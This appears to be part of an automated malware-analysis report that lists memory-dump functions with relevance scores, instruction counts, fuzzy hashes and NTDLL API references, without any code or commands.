                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 76c231bec90e714ba50c3e571e8645962bff1220c4dae868e9f7b71975b07ef9
                                                  • Instruction ID: 409c9033987aa2fd5c602ad78d75378af8cdb7817b80f20b84364071e02d40fa
                                                  • Opcode Fuzzy Hash: 76c231bec90e714ba50c3e571e8645962bff1220c4dae868e9f7b71975b07ef9
                                                  • Instruction Fuzzy Hash: 8E529E30B042048FDB15EB74D8546AEBBB2EF85304F268669E409DB3A6DF35DC4ACB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 003668B8, Relevance: .4, Instructions: 417COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 29ed34ad50ab8493c8a708d6f6580c0c06ad5cfe3026727e46d73fc21a19e574
                                                  • Instruction ID: 8dc1bf06ef34010f8fdaab616a29f900ab3f88e30dfe9dc0c4fabd9893577bea
                                                  • Opcode Fuzzy Hash: 29ed34ad50ab8493c8a708d6f6580c0c06ad5cfe3026727e46d73fc21a19e574
                                                  • Instruction Fuzzy Hash: E9E15270A082418FD712DB78C8517AEBFB2EF46344F2AC5AAD048DB296DB35DC45CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0036BD60, Relevance: .4, Instructions: 401COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d32df7d90ff48dc2be85d65caf42fe2800e90d10dbaf7df23ba6b4689f1a09f8
                                                  • Instruction ID: b7fad496088812b321d504efb1efa9a06fb6ac55c81745e7754f3117bec657d0
                                                  • Opcode Fuzzy Hash: d32df7d90ff48dc2be85d65caf42fe2800e90d10dbaf7df23ba6b4689f1a09f8
                                                  • Instruction Fuzzy Hash: 06E16E30A002159FCB15DFB8C9946AEB7B2BF84314F15C524E855EB39ADB31EC86CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00868210, Relevance: .3, Instructions: 277COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2351416134.0000000000860000.00000040.00000001.sdmp, Offset: 00860000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 68b2fafb0aad09ddc31efbe12a91bd08553de323b7bc64dde57189e0638ef03b
                                                  • Instruction ID: d3ca6b74044db7a45822f9bd7e6c1a7547d152bf9cf841c75a6680dd2709ad9a
                                                  • Opcode Fuzzy Hash: 68b2fafb0aad09ddc31efbe12a91bd08553de323b7bc64dde57189e0638ef03b
                                                  • Instruction Fuzzy Hash: 9BA1B434B0D3818FD713A774986466A3FF19F86344F1A85BBD148CB297EA68DC0AC761
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0086B850, Relevance: .3, Instructions: 260COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2351416134.0000000000860000.00000040.00000001.sdmp, Offset: 00860000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4bf3dae150f9030b89868f6e959eb38a4270979915658aac7aca0c5c4b1daed8
                                                  • Instruction ID: c307cd68adcdbb9170fe59488a0a709535b3c3a56cbacf516fbe2065a17693fe
                                                  • Opcode Fuzzy Hash: 4bf3dae150f9030b89868f6e959eb38a4270979915658aac7aca0c5c4b1daed8
                                                  • Instruction Fuzzy Hash: 7B91A230A002089FCB14DBB8D894AADB7F6FF85318F158539E515EB399DB70EC858B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00366768, Relevance: .3, Instructions: 259COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9e321c62663e2ebe6e9620e42d6213f8c2e7c0b5381383ae828fe87cc24818c9
                                                  • Instruction ID: d0040c9cd71c8995baf0519628464b6a3f6661657c62883d6576f50975f3bf00
                                                  • Opcode Fuzzy Hash: 9e321c62663e2ebe6e9620e42d6213f8c2e7c0b5381383ae828fe87cc24818c9
                                                  • Instruction Fuzzy Hash: 74912530B092814FCB129B78C8557AE7BF2AF82344F26C5BAD445DB396DB34DC0987A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00367EA8, Relevance: 4.0, APIs: 2, Instructions: 964COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368082
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 4fefd20e7fc7fb7c22eda042f1ae71648914d7c82d6a62d4146a2694a6fb987b
                                                  • Instruction ID: 35aa537c89308848c1f90b4f8351c4fd7e92bfa980b570e85fe665addb596860
                                                  • Opcode Fuzzy Hash: 4fefd20e7fc7fb7c22eda042f1ae71648914d7c82d6a62d4146a2694a6fb987b
                                                  • Instruction Fuzzy Hash: E5A226B4A04228CFCB659F30D85869DBBB6BF88305F1085EAD909A7754DB309EC5CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00367EC9, Relevance: 3.6, APIs: 2, Instructions: 635COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368082
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 5ced178777351bb33fe1fb108b11e1681c0392a6677bb2dc7cc06d457051e4bf
                                                  • Instruction ID: 8770742071185f786eb0bc3d4fdf8b43bdb27421a73a377eb74eed6207a0e393
                                                  • Opcode Fuzzy Hash: 5ced178777351bb33fe1fb108b11e1681c0392a6677bb2dc7cc06d457051e4bf
                                                  • Instruction Fuzzy Hash: D262F474904228CFDB659F70C85869CBBBABF48205F2085EAD909A7754DF309EC9CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00367F05, Relevance: 3.6, APIs: 2, Instructions: 630COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368082
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: c9cd3b115687c2e8357433aa4ce4b76b172d6bf81f0880ecb50826cbc590e93d
                                                  • Instruction ID: d0dc734e4de33818e8ca93b44c069c19f5ac24a4e2ed964a80da94f5bd0dc66b
                                                  • Opcode Fuzzy Hash: c9cd3b115687c2e8357433aa4ce4b76b172d6bf81f0880ecb50826cbc590e93d
                                                  • Instruction Fuzzy Hash: F4620574904224CFDB659F70C85869CBBBABF48205F2085EAD909A7754DF309EC9CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00367F4A, Relevance: 3.6, APIs: 2, Instructions: 623COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368082
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 63bc61ecea808926a045df8fbb4b36db32550f8438cfab2faa6ff1f45764d19a
                                                  • Instruction ID: d893bbbfcfda7da8aeed2594f34d4746eff22c73b50aaa980dd9623dc4648293
                                                  • Opcode Fuzzy Hash: 63bc61ecea808926a045df8fbb4b36db32550f8438cfab2faa6ff1f45764d19a
                                                  • Instruction Fuzzy Hash: 4C520574904224CFDB659F70C85869CBBBABF88205F2085EAD909A7754DF309EC9CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00367F8F, Relevance: 3.6, APIs: 2, Instructions: 616COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368082
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 2ab3c9e28faeae8b7df98cee70dd91d1f8983e0a9951216ceef338a3be191b8e
                                                  • Instruction ID: 8418395047fa464053dcb0bb0484ea467a6b66ccb856d07b4d8c7c816c9fc674
                                                  • Opcode Fuzzy Hash: 2ab3c9e28faeae8b7df98cee70dd91d1f8983e0a9951216ceef338a3be191b8e
                                                  • Instruction Fuzzy Hash: 8B520474904224CFCB659F70C85869CBBBABF88205F2085EAD909A7754DF309EC9CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00367FD4, Relevance: 3.6, APIs: 2, Instructions: 609COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368082
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 190225d5b75146d625e087703f8a8f7bf73a4ef33fb7b10eeb8ad3a5c7dce6d8
                                                  • Instruction ID: 69597713ccd3a8f07fae980f7e87c6662c54538bea81b77fd4a1fc4cae5e308f
                                                  • Opcode Fuzzy Hash: 190225d5b75146d625e087703f8a8f7bf73a4ef33fb7b10eeb8ad3a5c7dce6d8
                                                  • Instruction Fuzzy Hash: 41520474904224CFCB659F70C85869CBBBABF88205F2085EAD909A7754DB309EC9CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00368019, Relevance: 3.6, APIs: 2, Instructions: 602COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368082
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 45d5d84e1045386c626f07a5f8c566c8738428b3625b6001b7373adb56f6567d
                                                  • Instruction ID: 0969c00132d4fec3c37d8d9acf381da1bcfb5ed2bc069efb17f9fe5a8a9dfc9e
                                                  • Opcode Fuzzy Hash: 45d5d84e1045386c626f07a5f8c566c8738428b3625b6001b7373adb56f6567d
                                                  • Instruction Fuzzy Hash: 91520574904224CFCB659F70C85869CBBBABF88205F2085EAD909A7754DF309EC9CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0036805E, Relevance: 3.6, APIs: 2, Instructions: 595COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368082
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: c04a157e7cac482a0c0b6a05d620df4439579524ff183d5a50f4603257012ae4
                                                  • Instruction ID: c194d4e5c758f74ab2c7225865d47df66a72ce77ec77e1a95dd247d755fffc53
                                                  • Opcode Fuzzy Hash: c04a157e7cac482a0c0b6a05d620df4439579524ff183d5a50f4603257012ae4
                                                  • Instruction Fuzzy Hash: 98520574904224CFDB659F70C85869CBBBABF88205F2085EAD909A7754DF309EC9CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 003680B9, Relevance: 2.1, APIs: 1, Instructions: 584COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 6e126823b2de82f4ab0f7650ee459d430ba83211d6d9a428686c3610abea938c
                                                  • Instruction ID: f6c2b399f3de37e17c76b4f3a6df4b4e04b5774bc5ac209ee3fe7ceff8e4900c
                                                  • Opcode Fuzzy Hash: 6e126823b2de82f4ab0f7650ee459d430ba83211d6d9a428686c3610abea938c
                                                  • Instruction Fuzzy Hash: 6252F574904224CFDB659F70C85869CBBBABF88205F2085EAD909A7754DF309EC9CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 003680FE, Relevance: 2.1, APIs: 1, Instructions: 575COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 8dbf84690c235e3fb1fc0fd914e8098d1d8127bf172d9e971d1195d07e568411
                                                  • Instruction ID: 3c3fb852196a74db5ea48d768bcbc1d142f76875045c1eb318ba74c7cdffb047
                                                  • Opcode Fuzzy Hash: 8dbf84690c235e3fb1fc0fd914e8098d1d8127bf172d9e971d1195d07e568411
                                                  • Instruction Fuzzy Hash: 8F52F474904224CFCB659F70C85869CBBBABF88205F2085EAD909A7754DF309EC9CF65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0036813A, Relevance: 2.1, APIs: 1, Instructions: 570COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 1e14a112966096caf4528ae5d03355f19adeb48f9614cefeae83914faa54539e
                                                  • Instruction ID: edc2b68678cffa0ca7bfa50de748571b76c191d3f7fb4194b6473ddd8d6df192
                                                  • Opcode Fuzzy Hash: 1e14a112966096caf4528ae5d03355f19adeb48f9614cefeae83914faa54539e
                                                  • Instruction Fuzzy Hash: 4C420474904224CFDB659F70C85869CBBBABF88205F2085EAD909A7754DF309EC9CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0036817F, Relevance: 2.1, APIs: 1, Instructions: 563COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 814429dbc84388c1f23ae4fb91cb3493641b739ef766cb8219fb0b74621ab260
                                                  • Instruction ID: 1bf88a348b4babdb167d81e7f8473d44a5aeebc59e2b02c221704e3043fc1684
                                                  • Opcode Fuzzy Hash: 814429dbc84388c1f23ae4fb91cb3493641b739ef766cb8219fb0b74621ab260
                                                  • Instruction Fuzzy Hash: 16420474904224CFCB659F70C85869CBBBABF88205F2085EAD909A7754DF349EC9CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 003681C4, Relevance: 2.1, APIs: 1, Instructions: 556COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 23d903107dea0f327f3f2a89e77d2cac894d3a7f1f14182eb13928f4ccfcdede
                                                  • Instruction ID: 0384545b0a5a7caa8f43037f7b16867024e0f7c30ba1a2ca32555b719a3ee111
                                                  • Opcode Fuzzy Hash: 23d903107dea0f327f3f2a89e77d2cac894d3a7f1f14182eb13928f4ccfcdede
                                                  • Instruction Fuzzy Hash: F6420574904224CFCB659F70C85869CBBBABF88305F2085EAD909A7754DB349EC9CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00368209, Relevance: 2.0, APIs: 1, Instructions: 549COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 23003d1e59431e62f68fb9bbbb899940964899481746f8464d4d6580e241438c
                                                  • Instruction ID: 01626e03189f8e99b9dd38993959ebb9052fdbbcf0b572836f0a159c04072647
                                                  • Opcode Fuzzy Hash: 23003d1e59431e62f68fb9bbbb899940964899481746f8464d4d6580e241438c
                                                  • Instruction Fuzzy Hash: 98420574904224CFCB659F70C85869CBBBABF88305F2085EAD909A7754DB349EC9CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0036824E, Relevance: 2.0, APIs: 1, Instructions: 542COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 7ea45017a90ea114acfc4d67ca115ec6f2370367cc881b8bc1b48e509669770e
                                                  • Instruction ID: 2c38d634bdba777d64fc7222934a25f99e78c8207fcc68865089acef0f925433
                                                  • Opcode Fuzzy Hash: 7ea45017a90ea114acfc4d67ca115ec6f2370367cc881b8bc1b48e509669770e
                                                  • Instruction Fuzzy Hash: 53420474904224CFCB659F70C85869CBBBABF88305F2085EAD909A7754DB349EC9CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00368293, Relevance: 2.0, APIs: 1, Instructions: 535COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 8a17f5e0b916270245a1e570301906093dfa92227a34f94da8e7e1daacc3fdfc
                                                  • Instruction ID: cc7b6bb30b7cfb69d528befcb6e6105294e7608fbbfbcf39207e6e8ffce89af3
                                                  • Opcode Fuzzy Hash: 8a17f5e0b916270245a1e570301906093dfa92227a34f94da8e7e1daacc3fdfc
                                                  • Instruction Fuzzy Hash: 66420474904224CFCB659F70C85869CBBBABF88305F2085EAD909A7754DB349EC9CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 003682D8, Relevance: 2.0, APIs: 1, Instructions: 528COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 871d9a500d6fbaf85ff569cd8655373a03c18b8f7ab21b76e60d944b4dff0355
                                                  • Instruction ID: d214a8de5e72984a09a1ffe7076c3db539f80e3878f04b4f6ac2138664d5fbe1
                                                  • Opcode Fuzzy Hash: 871d9a500d6fbaf85ff569cd8655373a03c18b8f7ab21b76e60d944b4dff0355
                                                  • Instruction Fuzzy Hash: C1420574904224CFCB659F70C85869CBBBABF88305F2085EAD909A7754DB349EC9CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0036831D, Relevance: 2.0, APIs: 1, Instructions: 521COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: dc5f669db843e195f2a23b9162ac15ab22ceddccd8f911a262387b77fe06ad8f
                                                  • Instruction ID: a5b8fc5c0440a4eb635bb61f6d64622c62449aa83dc2348d9f7ded6a01606087
                                                  • Opcode Fuzzy Hash: dc5f669db843e195f2a23b9162ac15ab22ceddccd8f911a262387b77fe06ad8f
                                                  • Instruction Fuzzy Hash: A6320574904224CFCB659F70C85869CBBBABF88305F2085EAD909A7754DB349EC9CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00368362, Relevance: 2.0, APIs: 1, Instructions: 514COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 71cc253b2b33ee7baf39623a565c8171ad801c6c55c7a2aa030b35038134650c
                                                  • Instruction ID: e0aeb91250779440752c559691ccb52e96631c32874bc9e71aea9127cd8bf715
                                                  • Opcode Fuzzy Hash: 71cc253b2b33ee7baf39623a565c8171ad801c6c55c7a2aa030b35038134650c
                                                  • Instruction Fuzzy Hash: 59321574904224CFCB659F70C85869CBBBABF88205F2085EAD909A7754DF349EC5CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 003683A7, Relevance: 2.0, APIs: 1, Instructions: 507COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: bddf7636673abee98a0889f53ca014041a5a281eb2058cf881116319b42f72d3
                                                  • Instruction ID: 4a15ce3ae8bf44d6733fb9fa7d9e94adfa4a36e1658de564e9f70a8bb0b44086
                                                  • Opcode Fuzzy Hash: bddf7636673abee98a0889f53ca014041a5a281eb2058cf881116319b42f72d3
                                                  • Instruction Fuzzy Hash: F3321574904224CFCB659F70C85869CBBBABF88205F2085EAD909A7754DF349EC9CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 003683EC, Relevance: 2.0, APIs: 1, Instructions: 500COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: ed5f38bc28efcf9a2f8e1b2c4619dd21a2d23a3b9e68c2c9a9b12ec94857a2fe
                                                  • Instruction ID: 90ee8bd18271e7a62e89b3fb9463e15719f6e816841bb0aef5295b00a37b4515
                                                  • Opcode Fuzzy Hash: ed5f38bc28efcf9a2f8e1b2c4619dd21a2d23a3b9e68c2c9a9b12ec94857a2fe
                                                  • Instruction Fuzzy Hash: FF321574904224CFCB659F70C85869CBBBABF88205F2085EAD909A7754DF349EC9CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00368431, Relevance: 2.0, APIs: 1, Instructions: 493COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 54a421239b561deab2c673eb6f171b7330ada6fd7751344746b6c42488774563
                                                  • Instruction ID: 6d77cf0fe3de014c38d2ca8eb0ff812374cce552be92d46712caec54e61a7432
                                                  • Opcode Fuzzy Hash: 54a421239b561deab2c673eb6f171b7330ada6fd7751344746b6c42488774563
                                                  • Instruction Fuzzy Hash: B6321574904224CFCB659F70C85869CBBBABF88305F2085EAD909A3754DB349EC9CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00368476, Relevance: 2.0, APIs: 1, Instructions: 484COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: b7c31b7339e70f7da3824a45ace24a83feefa76fb5011ba4b871a699a74e0eed
                                                  • Instruction ID: c3265076ecfaf22009e481ff9be5d4c550d696a46981e18c49d91023a52a442a
                                                  • Opcode Fuzzy Hash: b7c31b7339e70f7da3824a45ace24a83feefa76fb5011ba4b871a699a74e0eed
                                                  • Instruction Fuzzy Hash: 40322574904224CFCB649F70D85869CBBBABF88205F2085EAD909A3754DF349EC9CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 003684B2, Relevance: 2.0, APIs: 1, Instructions: 479COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 0a1b9015c5a1853db6292621ee9c3c255713e25e536e0d21ce4b3136e8cae483
                                                  • Instruction ID: 1b87de2f491ae50454a95646ec0809274048a453752bd7a8ea54f4cc5a2c17f7
                                                  • Opcode Fuzzy Hash: 0a1b9015c5a1853db6292621ee9c3c255713e25e536e0d21ce4b3136e8cae483
                                                  • Instruction Fuzzy Hash: 0C220674904224CFCB649F70D85869CBBBABF88205F2085EAD909A7754DF349EC9CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 003684F7, Relevance: 2.0, APIs: 1, Instructions: 472COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00368A62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 034de2e0fa1981f71f4f514ca7181295c4eaecb5c664e801f8894a55609b26c6
                                                  • Instruction ID: b75dd3cdfecc609871c0a7391fe2a6ab6eaec290e3574c7d0995916b53844e96
                                                  • Opcode Fuzzy Hash: 034de2e0fa1981f71f4f514ca7181295c4eaecb5c664e801f8894a55609b26c6
                                                  • Instruction Fuzzy Hash: 99220574A04224CFCB649F70D85869CBBBABF88205F1085EAD909A7754DF349EC9CF64
                                                  Uniqueness

